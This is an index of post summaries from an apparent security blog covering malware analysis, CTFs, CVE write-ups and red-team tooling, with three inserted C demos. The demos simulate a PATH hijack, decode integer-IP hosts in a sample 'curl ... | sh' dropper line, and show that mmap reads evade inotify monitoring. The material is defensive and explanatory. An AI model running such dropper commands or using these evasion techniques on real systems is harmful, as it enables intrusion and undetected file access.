Welcome to Arch Cloud Labs! Arch Cloud Labs is a personal blog site for my side projects, CTF write-ups, independent research, and other ramblings. All content here is done on the author’s own time and does not reflect the view of their employer(s). Talks: DEF CON 2023 - WINE Pairing with Malware; DevSecOps Days 2023 - Golfing with Dragons: Building Secure Environments for CTF Competitions; ATT&CKCON 3.0 2022 - ATT&CKING Containers in The Cloud; SANS 2021 Blue Team Summit (Lightning Talk) - Liv...| Arch Cloud Labs
DIY Malware Homelab Course Do you have the desire to grow your skills in Malware Analysis, RE, and Software Engineering beyond just following tutorials? Arch Cloud Labs was built on honeypots and analyzing malware samples in a homelab environment to create a unique way to build those skills. This course offers a quick taste of building a malware analysis pipeline in your homelab to recreate analysis done by large firms, as well as to inspire you to do analysis of your own.| Arch Cloud Labs
About The Project The video game hacking community is often a source of inspiration for those in the information security field. From in-depth memory hooking techniques to circumvent anti-cheat to beating the final boss via Cheat Engine scripts, there’s always something to learn that’s parallel to the challenges faced by those in the offensive or defensive field. The techniques discussed in this blog are analogous to methodologies used for malware analysis when dealing with custom packers.| Arch Cloud Labs
About The Project Trying to stay up to date with the latest security research is challenging. There are countless security blog posts and interesting academic papers to keep up with. Realistically you don’t have time to sit down and read everything that looks interesting. Wouldn’t it be great to have your own personal “Audible”-esque service to listen to articles while you do chores around the house? This blog post is about integrating AWS’ Text-to-Speech service, “Polly”, to gene...| www.archcloudlabs.com
This past year at DEF CON, the Embedded Systems Village (ESV) sold a custom badge that, at the time, I thought was a CTF challenge. Fast forward months later, when I’ve actually sat down to look at the badge: it turns out the badge is centered around an FTDI chip, which enables communication over multiple embedded protocols. The badge actually enabled CTF contestants at DEF CON to poke at embedded systems, and is a pretty useful device for the casual hardware hacker.| www.archcloudlabs.com
About The Project Arch Cloud Labs’ last three blog posts were diving into different aspects of IoT/embedded vulnerabilities. Coming off of these bug hunting adventures, I wanted to build a unique set of Capture The Flag (CTF) challenges for this year’s Hack Fortress. To do this, I referenced OWASP’s Top 10 for IoT and used Buildroot to build the custom operating system for a Raspberry Pi 1 that was dubbed “HackFortress OS”.| www.archcloudlabs.com
About The Project Continuing on Arch Cloud Labs’ hardware and router reverse engineering journey, I wanted to dump the firmware of my TrendNet-731BRv1 by reading flash memory off the PCB rather than downloading the firmware from TrendNet’s website. Consider a scenario where the firmware is no longer hosted publicly by TrendNet (after all, it is a discontinued product): being able to dump firmware off of a device is not only useful for situations dealing with deprecated hardware but also for p...| www.archcloudlabs.com
About The Project Continuing from Arch Cloud Labs TrendNet 731BR router hacking blog post tearing apart firmware, we’ll now start poking at router hardware! The primary objective is to grow my skills in the embedded security domain for DEF CON’s IoT and Embedded Security Villages next year. This weekend’s project focused on a GL-AR750. I originally bought this router in 2017 as a travel router, and it has been collecting dust in my closet for quite some time.| www.archcloudlabs.com
About The Project Modern software development environments have significant debugging capabilities to troubleshoot issues arising from the complex nature of modern software. These debugging capabilities typically manifest in an Integrated Development Environment (IDE) as features that extend the IDE’s ability to examine the state of an application at run time or analyze previous binary executions. The standalone GNU Debugger (gdb) is integrated in a wide variety of IDEs and other 3rd party (1,2...| www.archcloudlabs.com
About The Project On September 18th, the Twitter account MalwareHunterTeam tweeted about a DLL, batch script, and PowerShell script being publicly hosted at 103[.]68[.]109[.]31. Given that a DLL was being hosted, I thought it would be an interesting target to reverse engineer. This blog post analyzes that DLL and ultimately patches this simple reverse shell to call back to a local virtual machine. OSINT Initial triage with VirusTotal reports that some vendors detect the target IP addre...| www.archcloudlabs.com
About The Project In continuation of Arch Cloud Labs’ previous blog post on Pwntools, we dive deeper into the Pwntools framework, focusing on automating interactions with binary programs. Imagine a scenario where you need your binary to follow a specific path before deploying your final payload. Simply piping your shellcode into the binary won’t suffice. This is where Pwntools’ “io” methods come to the rescue, simplifying the automation of both local and remote exploits across a var...| www.archcloudlabs.com
About The Project Following up from Arch Cloud Labs’ previous blog post on Pwntools, we’ll continue to explore the pwntools framework, this time focusing on shellcode generation. It’s not uncommon in pwn/reverse engineering challenges for executing shellcode to be a requirement of the challenge. Ultimately the end goal may be to obtain access to a remote system, or simply to display the contents of a file. Instead of searching for shellcode on exploit-db or Packet Storm, pwntoo...| www.archcloudlabs.com
About The Project Pwntools is a Python framework for automating different parts of exploit development, and Pwndbg is a GDB plugin that makes inspecting process memory and registers during that work far more convenient. These tools are highly popular amongst CTF players as they simplify and accelerate the creation of Proof of Concept (PoC) scripts for memory corruption exploits. I’m not proficient in using pwntools and pwndbg, but this marks the beginning of a series of blogs aimed at improving my skills with pwntools for memory corruption CTF challenges.| www.archcloudlabs.com
About the Project Several tutorials exist on how to leverage the GNU Debugger (GDB) to debug misbehaving applications. However, the majority of these blogs just show commands to run that poke at memory addresses, and don’t show the process of resolving said bug. This blog post will walk through how I recently identified, tried to fix, and ultimately reported a bug in dhcpcd 10.0.1 via gdb. Identifying The Issue The command line utility coredumpctl is used to interact with the coredumps saved ...| www.archcloudlabs.com
About The Project Recently a close friend fell victim to a scam that resulted in giving a scammer access to their laptop via LogMeIn. This type of scam is in line with the “refund scams” that YouTubers create videos about, where they spend hours on call with the scammers to waste their time. This blog post will discuss the steps Arch Cloud Labs took post-access, the artifacts recovered, and ultimately an examination of the phishing infrastructure.| www.archcloudlabs.com
About The Project CVE-2022-4883 outlines a Linux PATH hijacking vulnerability in the libxpm package. Libxpm is used in a variety of projects to parse “X Pixmap” images. The National Vulnerability Database rates this vulnerability at a CVSS score of 8.8 and Red Hat has given it a CVSS score of 8.1. Per the Arch Linux package page, 39 packages currently list libxpm as a dependency. This blog post will walk through the vulnerability and its exploitation.| www.archcloudlabs.com
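As an added illustration of the vulnerability class named above (my own example, not code from the post or from libXpm): the advisory describes libXpm invoking compression helpers such as uncompress and gzip through execlp(3) by bare name, so the directory search order in PATH decides which binary runs. The program below reproduces the lookup execlp performs, plants a fake helper in a directory the caller controls and puts that directory first in PATH, and shows the bare-name lookup picking the fake over the real tool. The hardened lookup pins helpers to absolute paths chosen ahead of time instead of consulting PATH at all. The helper names, the temp directory under /tmp and the pinned paths are assumptions for the demonstration.

```c
#define _DEFAULT_SOURCE
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Reproduce the lookup execlp(3)/execvp(3) perform for a bare command name:
 * walk PATH left to right and stop at the first executable match.
 * (strtok_r skips empty PATH entries, which execvp treats as "."; that
 * corner case does not matter for the demonstration.)
 * Returns 0 and fills `out` on a hit, -1 otherwise. */
int resolve_in_path(const char *cmd, const char *path, char *out, size_t outlen) {
    if (!path || strchr(cmd, '/'))        /* names containing '/' are not searched */
        return -1;
    char *copy = strdup(path);
    if (!copy)
        return -1;
    int rc = -1;
    char *save = NULL;
    for (char *dir = strtok_r(copy, ":", &save); dir; dir = strtok_r(NULL, ":", &save)) {
        snprintf(out, outlen, "%s/%s", dir, cmd);
        if (access(out, X_OK) == 0) { rc = 0; break; }
    }
    free(copy);
    return rc;
}

/* Simulate the attack: plant a fake `helper` in a directory we control, put
 * that directory first in PATH, and check whether a bare-name lookup picks it
 * over the real tool. Returns 1 if the fake wins, 0 if not, -1 on setup error. */
int hijack_wins(const char *helper) {
    char dir[] = "/tmp/pathhijack-XXXXXX";     /* assumed writable scratch location */
    if (!mkdtemp(dir))
        return -1;
    char planted[PATH_MAX], path[PATH_MAX], resolved[PATH_MAX];
    snprintf(planted, sizeof planted, "%s/%s", dir, helper);
    int fd = open(planted, O_WRONLY | O_CREAT | O_EXCL, 0755);
    if (fd < 0) { rmdir(dir); return -1; }
    const char *script = "#!/bin/sh\necho hijacked\n";   /* attacker's payload stand-in */
    if (write(fd, script, strlen(script)) < 0) { /* existence + x bit is what matters */ }
    close(fd);
    snprintf(path, sizeof path, "%s:/usr/bin:/bin", dir);  /* attacker dir first */
    int won = resolve_in_path(helper, path, resolved, sizeof resolved) == 0
              && strcmp(resolved, planted) == 0;
    unlink(planted);
    rmdir(dir);
    return won;
}

/* Hardened lookup: never consult PATH; helper locations are fixed ahead of
 * time (the direction upstream took with build-time paths). The table below
 * is an assumed stand-in for such constants. Returns NULL for unknown names. */
const char *pinned_helper(const char *helper) {
    static const struct { const char *name, *path; } table[] = {
        { "gzip",       "/usr/bin/gzip" },
        { "uncompress", "/usr/bin/uncompress" },
    };
    for (size_t i = 0; i < sizeof table / sizeof table[0]; i++)
        if (strcmp(helper, table[i].name) == 0)
            return table[i].path;
    return NULL;
}

int main(void) {
    printf("fake 'uncompress' wins PATH search: %d\n", hijack_wins("uncompress"));
    const char *p = pinned_helper("uncompress");
    printf("pinned lookup ignores PATH: %s\n", p ? p : "(unknown helper)");
    return 0;
}
```

The check worth keeping from this: any library that shells out to a helper by bare name inherits the caller's PATH, which in a setuid context or a web-app image converter is attacker-influenced far more often than people expect.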
About The Project ClamAV is an Open Source antivirus engine that is widely used on mail servers to scan incoming messages. On February 15, 2023 ClamAV published a security advisory detailing a potential remote code execution vulnerability in its HFS+ file parser. This vulnerability was given the CVE identifier CVE-2023-20032. While reading about this vulnerability, I stumbled across an open pull request indicating that it’s possible for non-privileged users to disable ClamAV.| www.archcloudlabs.com
About The Project GPT-3 has taken the InfoSec world by storm, and there are a million tweets, posts, articles, etc. with interesting use cases. Most of the use cases I’ve seen are focused on offensive/red team tooling. A notable exception is IDA Pro/Ghidra plugins that aid in commenting assembly code blocks with plain English (or close to it) explanations of what’s going on. Arch Cloud Labs has historically posted on how to generate shellcode with radare2 as well as how to extra...| www.archcloudlabs.com
About The Project In December of 2022, a DLL hijacking vulnerability with a CVSS score of 7.8 was reported in the Squirrel.Windows auto-install/update utility. This blog post will analyze the vulnerability and its root cause with procmon. Analyzing the Security Advisory Squirrel.Windows is an installation utility for Windows desktop applications that does not require a traditional Windows wizard installation. CVE-2022-46330 states that, Squirrel.Windows is both a tools...| www.archcloudlabs.com
Know Your Tools, and Fear No Bug One of my favorite series of blog posts of all time is “Unix as an IDE”. These blog posts walk you through how your Unix/Linux environment is your IDE. This philosophy challenges using a dedicated IDE for development, as all the tools you need are already on your operating system. Debugger integration? Why not just use gdb rather than the wrapper your IDE provides?| www.archcloudlabs.com
About The Project In November of 2022 the FreeBSD project announced CVE-2022-23093, a buffer overflow vulnerability in the ping utility. This blog post will analyze the vulnerability as well as document the steps to set up an environment to analyze the root cause of the issue with gdb. Illuminating the Security Advisory The FreeBSD advisory gave the following description of the vulnerability: ping reads raw IP packets from the network to process responses in the pr_pack() function.| www.archcloudlabs.com
About The Project Several Red Team projects exist to “live off the land” and avoid introducing additional executables into an environment. This gives Red Teamers and adversaries an advantage: nothing within their toolkit risks getting caught by the latest and greatest EDR. But what about the Blue Teamers? The DFIR engineers out there tirelessly working to ensure the safety of an organization? This blog post highlights how to integrate Team Cymru’s Malware Hash Registry with yo...| www.archcloudlabs.com
About the Project Today, we’re going to analyze a malicious binary recently identified by Arch Cloud Labs’ malware collection system “Archie”. This binary leverages the LoadLibraryA function to resolve DLLs at run time for additional functionality. Malware samples typically do this to ensure there’s limited information in the import table, in an attempt to avoid triggering static rule detection or to evade EDR products. This particular sample struck me as interesting because of the stack ...| www.archcloudlabs.com
About The Project Last week I looked at a Cryptojacking campaign that leveraged a curl trick in the bash dropper to resolve IPv4 addresses from large integer values. Revisiting the bash dropper, I discovered the threat actor has updated the script to download and execute a command-and-control payload called “Termite” from the Platypus GitHub project. This blog walks through the analysis of the termite agent, and how to statically identify the upstream IPv4 address in use.| Arch Cloud Labs
About The Project Today we’re going to look at a couple of neat curl tricks I found in a recent bash dropper I was analyzing that resulted in surprisingly low VirusTotal detections! As previously blogged about ([1][2][3]), Arch Cloud Labs runs a handful of honeypots to collect attacker data to hone my skills in DFIR topics. While this was just another cryptominer targeting an exposed Docker socket, the initial dropper script used a neat trick with curl that I think was worth a quick write-up.| Arch Cloud Labs
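The two entries above both turn on the same curl behaviour: a URL host written as one large integer still resolves, because glibc's resolver accepts the legacy single-number forms that inet_aton(3) does (decimal, 0x-prefixed hex, and leading-zero octal), and curl simply hands the host string to it. The program below is an added example, not code from either post: it reproduces the arithmetic that turns such an integer into a dotted quad, cross-checks the result against inet_aton, and scans a dropper line for bare-integer hosts so the real address can be pulled out statically. The sample dropper line and the address in it are constructed for the example.

```c
#define _DEFAULT_SOURCE
#include <arpa/inet.h>
#include <ctype.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Decode a host given as a single integer (decimal "3232235777", hex
 * "0xC0A80101", leading-zero octal "030052000401") into dotted-quad form.
 * Returns 0 on success, -1 if `host` is not a bare 32-bit integer. */
int int_to_dotted(const char *host, char out[INET_ADDRSTRLEN]) {
    if (!isdigit((unsigned char)host[0]))    /* rejects "", "+1", " 1", "-1" */
        return -1;
    char *end;
    errno = 0;
    unsigned long v = strtoul(host, &end, 0); /* base 0: "0x" = hex, "0" = octal */
    if (*end != '\0' || errno != 0 || v > 0xFFFFFFFFUL)
        return -1;
    snprintf(out, INET_ADDRSTRLEN, "%lu.%lu.%lu.%lu",
             (v >> 24) & 0xFF, (v >> 16) & 0xFF, (v >> 8) & 0xFF, v & 0xFF);
    return 0;
}

/* Does `host` decode to exactly `expected`? */
int decodes_to(const char *host, const char *expected) {
    char buf[INET_ADDRSTRLEN];
    return int_to_dotted(host, buf) == 0 && strcmp(buf, expected) == 0;
}

/* Cross-check against libc: inet_aton() implements the same legacy grammar
 * that makes the curl trick work. Returns 1 when libc produces `dotted`. */
int libc_agrees(const char *host, const char *dotted) {
    struct in_addr a;
    if (!inet_aton(host, &a))
        return 0;
    return strcmp(inet_ntoa(a), dotted) == 0;
}

/* Triage helper: scan a dropper line for "scheme://host" where host is a bare
 * integer. Writes the decoded dotted quad of the first hit into `out` and
 * returns 1; returns 0 if every host is a name or an ordinary dotted quad. */
int find_numeric_host(const char *line, char out[INET_ADDRSTRLEN]) {
    const char *p = line;
    while ((p = strstr(p, "://")) != NULL) {
        p += 3;
        char host[64];
        size_t n = 0;
        while (p[n] && p[n] != '/' && p[n] != ':' && p[n] != ' ' && n < sizeof host - 1) {
            host[n] = p[n];
            n++;
        }
        host[n] = '\0';
        if (int_to_dotted(host, out) == 0)
            return 1;
        p += n;
    }
    return 0;
}

/* Does the first numeric host in `line` decode to `expected`? */
int line_decodes_to(const char *line, const char *expected) {
    char buf[INET_ADDRSTRLEN];
    return find_numeric_host(line, buf) && strcmp(buf, expected) == 0;
}

int main(void) {
    /* Constructed sample, modelled on the dropper pattern described in the post. */
    const char *line = "curl -fsSL http://3232235777/x.sh | sh";
    char ip[INET_ADDRSTRLEN];
    if (find_numeric_host(line, ip))
        printf("numeric host decodes to %s (libc agrees: %d)\n",
               ip, libc_agrees("3232235777", ip));
    return 0;
}
```

The same decoder covers the hex and octal spellings a dropper author might switch to next, which is why the scan accepts all three rather than only decimal.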
About The Project I’m currently studying for my Certified Kubernetes Security Specialist (CKS) certification. As part of this certification, training courses recommend looking into runtime security provided by Falco. Falco is a Cloud Native Computing Foundation project, created by Sysdig, that provides alerting on cloud, container and Kubernetes events. While training courses such as “A Cloud Guru” do a good job of covering container and host based log ingestion with Falco, I wanted to...| www.archcloudlabs.com
About The Project Security researcher Silas Cutler recently tweeted a link to a unique data set of Cobalt Strike Beacon payloads, and their extracted configurations (thanks Silas!). This is a fairly large data set going back to November of 2021, and containing over 100k entries (112,900 to be exact, but I had trouble parsing about 900 of them). This blog post will take a quick look at a subset of the data (112,066 total records) provided by said dataset within Elasticsearch.| www.archcloudlabs.com
About The Project Recently I’ve started supporting a package in the Arch User Repository (AUR) in order to contribute to the Arch Linux project. In an effort to “automate all the things!”, I have regular Jenkins builds cloning and building the upstream GitHub project. This blog post outlines how I’ve tried to align with the Supply-chain Levels for Software Artifacts (SLSA) framework as an exercise in securing build supply chains for community contributions.| www.archcloudlabs.com
About The Project The e-zine tmp.out focuses on ELF/Linux related research in the style of Phrack. After reading an article on fuzzing radare2 for 0days in 30 lines of code, I thought it would be a fun weekend project to extend this research and port their code to a container and deploy it in a Kubernetes cluster. To take it one step further, building fresh releases of the radare2 project’s master branch, and integrating it into a CI/CD pipeline which then deployed container builds to a Kube...| www.archcloudlabs.com
About The Project Lately I’ve been playing around more with binary exploitation CTF challenges. This blog post will cover recent experimentation with ELF binary loaders, and extending them to fetch a remote resource, load it into memory, and finally execute it. There are several github repos with different purpose built binary loaders for ELFs/PEs/Machos/etc… so it was easy to focus on experimentation and debugging rather than “why won’t my code compile?| www.archcloudlabs.com
About the Project Lately, I’ve seen some horror stories (1, 2) about side projects gone awry resulting in HUGE cloud bills. As a homelab enthusiast and cloud user I wanted to write up some notes on how I stay on top of billing to avoid surprise costs. This blog will outline the alerting pipeline I’ve built in my homelab. Building Notification Pipelines AWS Billing allows for e-mail notifications in the event you’re approaching a particular self-defined billing threshold.| www.archcloudlabs.com
About The Project With IDA Pro’s recent announcement of moving to a subscription model, some are revisiting the current state of available decompilers. Off the top of my head you have Hopper, Ghidra, Radare2/Cutter, and of course Binary Ninja. Each of these utilities has its own pros and cons, and considering how frequently you spend time performing reverse engineering, one may make more sense than another with regards to monetary investment.| www.archcloudlabs.com
Preparing for The CKA & Diving into the Kubes I recently passed the Linux Foundation’s Certified Kubernetes Administrator (CKA) certification and thought I’d throw some notes together on how I prepared. The CKA is a hands-on practical test. There are no multiple-choice questions, just raw application of Kubernetes knowledge. Overall I enjoyed the CKA, and find that the questions asked in the exam mirror the real-world, day-to-day tasks I run into with Kubernetes.| www.archcloudlabs.com
The Art of The Homelab I’ve been homelabbing/blogging about side projects for about two years now and thought I’d compile a list of things that have been useful to me in my homelabbing journey. These are just my opinions and everyone’s goals for their homelab are different. I view my homelab as a blank canvas upon which to experiment, fail, learn and share said failures (or successes) with others. It’s a labor of love, but nothing makes my day like a Youtube/Reddit comment that says ...| www.archcloudlabs.com
About The Project Threat Intelligence comes in many forms and services that help enable the analyst, incident responder, reverse engineer, etc… to be aware of ongoing threats against enterprise environments. As a home lab enthusiast, I don’t have access to enterprise subscriptions (ex: Virustotal) to obtain insight into the latest threats. Luckily for the community, several free resources exist. This blog post will focus on how I leverage free or low cost services to gain a deeper underst...| www.archcloudlabs.com
About The Project Elasticsearch is a key component in many backend centralized logging stacks. Several Open Source and commercial software appliances leverage Elasticsearch in one way or another. This is especially true for the SIEM space. While there are many blogs on how to assess/extract data from an Elasticsearch cluster during a pentest/red team assessment, I have not seen a lot of conversations on how the discovery of an Elasticsearch server can be leveraged beyond just dumping data.| www.archcloudlabs.com
About The Project CVE-2021-3156 is a sudo vulnerability that sat in the code base for roughly ten years and allows for privilege escalation in Linux environments. If you’re responsible for a Linux server, this definitely caught your attention due to the severity. Some rough PoCs wound up on GitHub and also on exploit-db recently. Besides patching through upstream providers’ supplied patches [0,1], how would you hunt for this in your environment? This leads me to leveraging auditd in the previously blogged about red team range.| www.archcloudlabs.com
About the Project The more Cryptominer malware I look at (or anything targeting Linux), the more trends I’ve identified that are common regardless of the underlying intent. Everyone loves to use UPX. And why wouldn’t they? It’s a free Open Source packer that you can modify if you so choose, or leverage what’s available in most Linux distribution repos. Everyone loves embedding ELFs in ELFs. In my anecdotal analysis, Cryptominers have triaged systems for basic OS information before dec...| Arch Cloud Labs
About The Project With the pandemic in full swing and work from home being normal, it’s natural to upgrade your home setup to make work as enjoyable as possible. Maybe you don’t have those nice monitors at home that you do have at work, but hey, at least you bought a new mouse and no longer have to use the trackpad! This is where the project comes into play.| www.archcloudlabs.com
About The Project - Taking a look in the Attic I was poking around at PRs and issues within the Metasploit project and stumbled across something pretty interesting. There’s a GitHub label that exists within the Metasploit project called “attic”. The “attic” label from my observations appears to be for modules that maintainers or contributors need to finish up but don’t quite have the time. Much like that shoebox full of comic books, you carefully set it aside in the attic to retur...| www.archcloudlabs.com
About The Project Tools native to an operating system that can be leveraged offensively are always attractive to red teamers. You can go a long way with PowerShell and other native Windows utilities during engagements, but sometimes these utilities are too loud for your use case. With PowerShell script block and module logging enabled within an environment, you’re being detected along the way. Wouldn’t it be nice if there were various tools already installed that can be...| www.archcloudlabs.com
About the Project Signed Binary Proxy Execution is a method of executing a command or executable through another, digitally signed executable. This method can be leveraged by those in the offensive computing community to bypass defensive mechanisms: by routing execution through an executable that has been digitally signed, the trust placed in that application is borrowed to perform a particular malicious action. This post explores leveraging Signed Binary Proxy Execution via PyCharm, a popular Python IDE.| www.archcloudlabs.com
About the Project At the time of this writing PoshC2 has a Python and a Bash agent that can be deployed on a target machine. Both offer plenty of room for modification to achieve execution and initial delivery in unique ways. The lovely thing about Linux is that there is always another way to achieve the same goal. This second video in Arch Cloud Labs’ PoshC2 series explores how to begin making basic changes to the PoshC2 dropper, as well as some inspiration for others to go ...| www.archcloudlabs.com
About the Project For the first time Arch Cloud Labs will be posting a video tutorial on how to get started with PoshC2 in a Linux environment. This video assumes some prior experience with Linux/offensive tooling frameworks, and provides just enough information to get you up and running with PoshC2. For those interested in what the exact configurations used in the video were, please checkout the snippets below. Check out the video here.| www.archcloudlabs.com
About the Project C2 Frameworks seem to keep popping up with neat features and add-ons. I wanted to create a lab environment where I could experiment with said utilities, and understand what the forensic footprint looked like for each tool. This led to “shellcompany.lan”, my red team range environment for tool testing and experimentation. Environment Considerations & Initial Design When initially designing the environment, I wanted to emulate a small business network with significant logg...| www.archcloudlabs.com
Houseplant CTF 2020 - Imagery CTF challenge “Imagery” was a high-value forensics puzzle with the following description: Photography is good fun. I took a photo of my 10 Windows earlier on but it turned out too big for my photo viewer. Apparently 2GB is too big. :( https://drive.google.com/file/d/1y4sfIaUrAOK0wXiDZXiOI-q2SYs6M--g/view?usp=sharing Alternate: https://mega.nz/file/R00hgCIa#e0gMZjsGI0cqw88GzbEzKhcijWGTEPQsst4QMfRlNqg Dev: Tom Upon downloading the image, I originally ran basic ...| www.archcloudlabs.com
About The Project Over the past two weeks, I have been analyzing registered domain names correlated to the current pandemic as a side project. This was all inspired by @jeremiahg’s tweet about the ever-growing number of registered domains related to “covid-19”. During times of crisis, malicious actors act to profit from those in fear or those showing compassion for their fellow humans. One avenue of profit is phishing. There is no shortage of historical data relating to scams during times of...| www.archcloudlabs.com
ISTS - Collegiate Red vs Blue Competition This past weekend the Rochester Institute of Technology’s security club RITSEC put on their annual Information Security Talent Search competition. This competition requires Blue Team members to keep critical services (logging clusters, web servers, Active Directory, etc…) running, complete business injects and provide customer support all while being infiltrated by a Red Team. A big twist on this competition is that the Blue Teams can attack other...| www.archcloudlabs.com
Hack Fortress: Forensic Challenges This past Shmoocon, the Hack Fortress group returned to deliver another action-packed day of Team Fortress 2 and hacking. As previously discussed, Hack Fortress is a combination of a First Person Shooter (Team Fortress 2) and a jeopardy-style CTF. Teams of ten are assembled with six gamers and four hackers in a single-elimination bracket. Hackers solve challenges and unlock points to buy in-game items for gamers.| www.archcloudlabs.com
About The Project Continuing from my Malware Analysis Pipeline project, I have been spending some time tearing apart samples trying to get better at malware analysis. Doing so, I run across files that I’ve never heard of before. Obviously, Google is the first stop during the triage period of an unknown function call/DLL, etc… However, what if the DLL dropped was a modified version of a legitimate application? This is where the NSRL comes into play.| www.archcloudlabs.com
About The Project In a previous blog post, I covered how I was obtaining samples, extracting metadata, and querying the results. I’ve moved from testing in Docker containers to stand-alone VMs. Since I have a steady flow of binaries, I need to tag the binaries with something meaningful, so I’m not just aimlessly looking through binary after binary. YARA was the answer for tagging samples. Additional minor improvements were also made in the homelab to prevent any accidental malware execution.| www.archcloudlabs.com
About The Project I wanted to further my malware analysis/reverse engineering skills and create a simple malware analysis pipeline. The pipeline I planned to build can be seen below. By collecting metadata about the binaries (imports/exports/pdbs/etc…) I can quickly filter and pivot on a subset of features that interest me. Over time it may be possible to enrich this data and have something really unique in the old homelab. However, before any analysis can begin I need to acquire samples.| www.archcloudlabs.com
Hack Fortress RE Challenge: Troll Hunter What is Hack Fortress? Hack Fortress is a combination of a First Person Shooter (Team Fortress 2) and a jeopardy-style CTF. Teams of ten are assembled with six gamers and four hackers in a single-elimination bracket. Hackers solve challenges and unlock points to buy in-game items for gamers. Each round is thirty minutes long except for the finals which run for forty-five minutes. This event has been running consistently at DEF CON and Shmoocon for almos...| www.archcloudlabs.com
Why Build it? - The Origin Story Scrolling through Twitter and seeing my InfoSec friends and role models post crazy malware analysis writeups, CVE disclosures, and custom tool blog posts; I ask myself “How can I become better?”. How can I advance and diversify my skillset from the 9-5 I currently have? From my experience “homelabbing”, CTFs and conference talks have increased my perspective and exposure to technologies and ideas I otherwise would not normally encounter.| www.archcloudlabs.com
About The Project Recently I’ve been building rudimentary file monitoring tools to get better at Golang, and build faux-watchdog programs for research at Arch Cloud Labs. Through this experimentation, I’ve identified some interesting gaps in the inotify subsystem that are new to me, but are well documented in the Linux man pages. This blog post will explore how to circumvent read detections implemented by inotify. Inotify As a Monitoring Solution Per the Linux man page, the inotify subsys...| www.archcloudlabs.com
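The gap the entry above alludes to, and that man 7 inotify spells out, is that accesses made through mmap(2) are not reported: inotify hooks the VFS read/write path, and a page fault on a mapped file never goes through it. The program below is an added example (mine, not the post's own code) that makes the gap observable: it creates a throwaway file, watches it for IN_ACCESS, reads it once with read(2) and once by faulting in a private mapping, and returns how many events the watcher saw for each. The temp path under /tmp and the file contents are assumptions for the demonstration.

```c
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/inotify.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

/* Read the first bytes of `path` with read(2): the filesystem API path that
 * inotify instruments, so a watcher sees IN_ACCESS. Returns 0 on success. */
int read_via_read(const char *path) {
    int fd = open(path, O_RDONLY);
    if (fd < 0) return -1;
    char tmp[64];
    ssize_t n = read(fd, tmp, sizeof tmp);
    close(fd);
    return n < 0 ? -1 : 0;
}

/* Read the same bytes through a mapping: the page fault that pulls the data
 * in bypasses the VFS read path, so no IN_ACCESS is generated. Returns 0 on
 * success. */
int read_via_mmap(const char *path) {
    int fd = open(path, O_RDONLY);
    if (fd < 0) return -1;
    struct stat st;
    if (fstat(fd, &st) < 0 || st.st_size == 0) { close(fd); return -1; }
    char *m = mmap(NULL, (size_t)st.st_size, PROT_READ, MAP_PRIVATE, fd, 0);
    close(fd);
    if (m == MAP_FAILED) return -1;
    volatile char first = m[0];    /* touch the page: the content has now been read */
    (void)first;
    munmap(m, (size_t)st.st_size);
    return 0;
}

/* Drain a non-blocking inotify descriptor and count IN_ACCESS events. */
static int count_access_events(int ifd) {
    char buf[4096] __attribute__((aligned(__alignof__(struct inotify_event))));
    int count = 0;
    for (;;) {
        ssize_t n = read(ifd, buf, sizeof buf);
        if (n <= 0) break;                        /* EAGAIN: queue is empty */
        for (char *p = buf; p < buf + n;) {
            struct inotify_event *ev = (struct inotify_event *)p;
            if (ev->mask & IN_ACCESS) count++;
            p += sizeof *ev + ev->len;
        }
    }
    return count;
}

/* Create a throwaway file, watch it for IN_ACCESS, run `reader` on it, and
 * return how many IN_ACCESS events the watcher observed (-1 on setup error). */
int access_events_for(int (*reader)(const char *)) {
    char path[] = "/tmp/inotify-gap-XXXXXX";     /* assumed writable scratch location */
    int fd = mkstemp(path);
    if (fd < 0) return -1;
    const char *content = "secret\n";             /* constructed file contents */
    if (write(fd, content, strlen(content)) < 0) { close(fd); unlink(path); return -1; }
    close(fd);
    int ifd = inotify_init1(IN_NONBLOCK);
    if (ifd < 0) { unlink(path); return -1; }
    int result = -1;
    if (inotify_add_watch(ifd, path, IN_ACCESS) >= 0 && reader(path) == 0)
        result = count_access_events(ifd);
    close(ifd);
    unlink(path);
    return result;
}

int main(void) {
    printf("read(2): %d IN_ACCESS event(s)\n", access_events_for(read_via_read));
    printf("mmap(2): %d IN_ACCESS event(s)\n", access_events_for(read_via_mmap));
    return 0;
}
```

For a watchdog this means an inotify-only monitor is fine for catching `cat /etc/shadow` but blind to a reader that maps the file, which is exactly why read detection on sensitive files is better anchored in auditd or fanotify-based tooling than in inotify alone.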